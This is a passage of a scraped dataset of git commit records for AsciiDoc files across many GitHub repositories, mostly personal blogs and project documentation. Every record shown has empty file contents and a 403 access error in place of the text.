2015-02-09-A-new-blog.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-09-A-new-blog.adoc","new_file":"_posts\/2015-02-09-A-new-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ludolphus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60040bc07f55e36da74c15508a515c5b97a5cff4","subject":"Create 2016-11-24-FIRST-Post.adoc","message":"Create 2016-11-24-FIRST-Post.adoc","repos":"Evolution2626\/blog,Evolution2626\/blog,Evolution2626\/blog,Evolution2626\/blog","old_file":"_posts\/2016-11-24-FIRST-Post.adoc","new_file":"_posts\/2016-11-24-FIRST-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Evolution2626\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cf492a87dfc821915210896edac2f54a623264a","subject":"y2b create post Wireless + Mechanical - Is This Real Life?","message":"y2b create post Wireless + Mechanical - Is This Real Life?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-06-Wireless--Mechanical--Is-This-Real-Life.adoc","new_file":"_posts\/2015-03-06-Wireless--Mechanical--Is-This-Real-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c9c8f7be72a6c431d4edf52c6ac944c157ec0fa","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8825c99f32860120af9e2d8a6f8100e8fefb974","subject":"YKCS11: added release notes.","message":"YKCS11: added release notes.\n","repos":"Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/YKCS11_release_notes.adoc","new_file":"doc\/YKCS11_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d2054467839fd631b855c56d845c7b910ec0ae78","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68241c6f1fb9f5f5254310f0a86fa40992ad44c3","subject":"Create 2016-05-21-New-Dawn.adoc","message":"Create 2016-05-21-New-Dawn.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-21-New-Dawn.adoc","new_file":"_posts\/2016-05-21-New-Dawn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3874f5768273098c819d4cba8fc81b0a8814b1cb","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80196e734d9b6fe0ed450b0a17bb6e3de2b39c0b","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1be3ecf5a23574da317667a604117793552957d4","subject":"Update 2019-03-18-.adoc","message":"Update 2019-03-18-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-18-.adoc","new_file":"_posts\/2019-03-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98195803dde1a0a5455af4754bb8b18bebb917f5","subject":"started documentation","message":"started documentation","repos":"oss-ethinking\/amajza","old_file":"amajza-json\/README.adoc","new_file":"amajza-json\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oss-ethinking\/amajza.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ed6f50d26bd28c5bc51b4ed87c9323da71c9791","subject":"Publish 2017-02-23.adoc","message":"Publish 2017-02-23.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-23.adoc","new_file":"2017-02-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94920b3a7d75692d24dedc32d90d64c3d4268f70","subject":"Update 2015-05-01-Mein-erster-Eintrag.adoc","message":"Update 2015-05-01-Mein-erster-Eintrag.adoc","repos":"pointout\/pointout.github.io,pointout\/pointout.github.io,pointout\/pointout.github.io","old_file":"_posts\/2015-05-01-Mein-erster-Eintrag.adoc","new_file":"_posts\/2015-05-01-Mein-erster-Eintrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pointout\/pointout.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b4c8313bfaa56a57fe0f49371b8d99a8f7420fd","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5e22639fa46461d11e031c73fbc73f9f7021cc1","subject":"y2b create post TOASTING WITH GLASS","message":"y2b create post TOASTING WITH GLASS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-21-TOASTING-WITH-GLASS.adoc","new_file":"_posts\/2016-06-21-TOASTING-WITH-GLASS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"428f04e724071be00f1a738ea1ac0f8bb5db262c","subject":"Update 2017-03-15-Development-Setting.adoc","message":"Update 2017-03-15-Development-Setting.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-03-15-Development-Setting.adoc","new_file":"_posts\/2017-03-15-Development-Setting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d7c9c8772e54bf461d2faeb876b4c3e97b6faf4","subject":"Create Keyplayers.adoc","message":"Create Keyplayers.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Keyplayers.adoc","new_file":"Keyplayers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"47393bd0ccc83741830de2388edc4d24174b2755","subject":"add cloju.ru","message":"add cloju.ru\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojuru.adoc","new_file":"content\/events\/2019\/clojuru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f45f5607042d6d5003b328ebd0e70de140c37308","subject":"Update 2015-02-06-Blog-Easily-with-HubPress.adoc","message":"Update 2015-02-06-Blog-Easily-with-HubPress.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-02-06-Blog-Easily-with-HubPress.adoc","new_file":"_posts\/2015-02-06-Blog-Easily-with-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9a5b40d1846f772f638344fdfd1c39baf8512e3","subject":"Update 2016-06-29-PHP-CSV.adoc","message":"Update 2016-06-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-29-PHP-CSV.adoc","new_file":"_posts\/2016-06-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f92bb1daca92c72e615703647f34d2e3eb8774b","subject":"Update 2016-10-15-Teste-2.adoc","message":"Update 2016-10-15-Teste-2.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-15-Teste-2.adoc","new_file":"_posts\/2016-10-15-Teste-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65e2b496992064fbb2ea89f5d906fdbb8bfbf1f7","subject":"Update 2017-08-19-Prepare.adoc","message":"Update 2017-08-19-Prepare.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-19-Prepare.adoc","new_file":"_posts\/2017-08-19-Prepare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03a22e0c2bf603640fd76cb71a2859c9367ebbe3","subject":"cleaning up the flow","message":"cleaning up the flow\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f286d3b318d50d8a27115de2f6c7518c078a42a","subject":"Update 2015-11-02-Read-only-master-branch.adoc","message":"Update 2015-11-02-Read-only-master-branch.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2015-11-02-Read-only-master-branch.adoc","new_file":"_posts\/2015-11-02-Read-only-master-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0541c5544bb5196a4aacd340834c0355daf72b41","subject":"Update 2017-08-07-Drowning-in-Java-Script.adoc","message":"Update 2017-08-07-Drowning-in-Java-Script.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-07-Drowning-in-Java-Script.adoc","new_file":"_posts\/2017-08-07-Drowning-in-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d1eeab2bd469e66eced3b52598cc881c9180bce","subject":"Adding adoc for custom input","message":"Adding adoc for custom input\n","repos":"vaadin\/vaadin-date-picker,vaadin\/vaadin-date-picker","old_file":"docs\/vaadin-date-picker-customization.adoc","new_file":"docs\/vaadin-date-picker-customization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/vaadin-date-picker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a25f4dd95d73830904d2edb08fc57a6bad32f02a","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9190b80d3b57cd09d03329532501864be6da707b","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32046e6d4af34aee68bab5c804527ab80e21f6f3","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"620b5837cc923bfb78d593159e06503317408191","subject":"More details","message":"More details\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d86c11e260e30e2954f7a9827e99e98bfe5616c","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"079e4a5a44ee6d041d9f06e16ad9a5bdeeb1fc86","subject":"Captain's Log FAQ (edit)","message":"Captain's Log FAQ (edit)\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5a95dafa5ee9e2d7ef096654e1d73b1d92c5b1e8","subject":"APPNG-2001 use different placeholders for snapshot and stable versions, made links external","message":"APPNG-2001 use different placeholders for snapshot and stable versions,\nmade links external","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75e0bd381fcae573a9993fbf438201c49579c992","subject":"Add Code of Conduct","message":"Add Code of Conduct\n","repos":"jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,mbogoevici\/spring-cloud-data,trisberg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,donovanmuller\/spring-cloud-dataflow,markfisher\/spring-cloud-data,mminella\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,sabbyanandan\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-data,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-data,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,donovanmuller\/spring-cloud-dataflow,mminella\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,mbogoevici\/spring-cloud-data,markfisher\/spring-cloud-data,donovanmuller\/spring-cloud-dataflow,mbogoevici\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/spring-cloud-dataflow.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"becd9c4c8267ae5512e7a631069dfc8f58fdd19d","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f350c6e58bf18fae54c6af77bc37fed14e83a7f","subject":"Update data provider documentation to describe the new design (#8317)","message":"Update data provider documentation to describe the new design (#8317)\n\n","repos":"peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,asashour\/framework,Legioth\/vaadin,mstahv\/framework,kironapublic\/vaadin,Legioth\/vaadin,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,Legioth\/vaadin,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,peterl1084\/framework,Legioth\/vaadin,asashour\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,Legioth\/vaadin,peterl1084\/framework","old_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb85fab4ab39f6486e2d13c031ba6c35b4b7c5bc","subject":"Updated sample design","message":"Updated sample design\n","repos":"ufried\/resilience-tutorial,ufried\/resilience-tutorial","old_file":"exercise_02_complete_parameter_checking\/design.adoc","new_file":"exercise_02_complete_parameter_checking\/design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ufried\/resilience-tutorial.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2b03a9bfd615e2426d25316b15b74d125db4c26","subject":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","message":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dc54fd3476ddcd5c920eefdaac4a372ebdd718a","subject":"Added description of tasks to follow up stroke patient","message":"Added description of tasks to follow up stroke patient\n","repos":"DIPSASA\/dips-ckm,bjornna\/dips-ckm","old_file":"doc\/openehr-task\/workflow-13-stroke.adoc","new_file":"doc\/openehr-task\/workflow-13-stroke.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ede521dc8d3c15fe6ade08f7561bf2609ff6e932","subject":"authorizeUrls -> authorizeRequests","message":"authorizeUrls -> authorizeRequests\n\nReplace remaining authorizeUrls with authorizeRequests\n\nFixes gh-3875\n","repos":"djechelon\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,SanjayUser\/SpringSecurityPro,thomasdarimont\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,ollie314\/spring-security,kazuki43zoo\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,spring-projects\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,pwheel\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,pwheel\/spring-security,ollie314\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,wkorando\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,ollie314\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,mdeinum\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cf7154abbf58f308b785decccdf5369d82cc8b7","subject":"y2b create post The Most Requested Smartphone I've NEVER Featured...","message":"y2b create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-24-TheMostRequestedSmartphoneIveNEVERFeatured.adoc","new_file":"_posts\/2017-12-24-TheMostRequestedSmartphoneIveNEVERFeatured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"964ecb4a5f8371695b8de3c945fe3bd88656df78","subject":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","message":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab236f4ecf719e51bee1aadd09cb18da0e027323","subject":"y2b create post Got an iPad Air","message":"y2b create post Got an iPad Air","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-01-Got-an-iPad-Air.adoc","new_file":"_posts\/2013-11-01-Got-an-iPad-Air.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 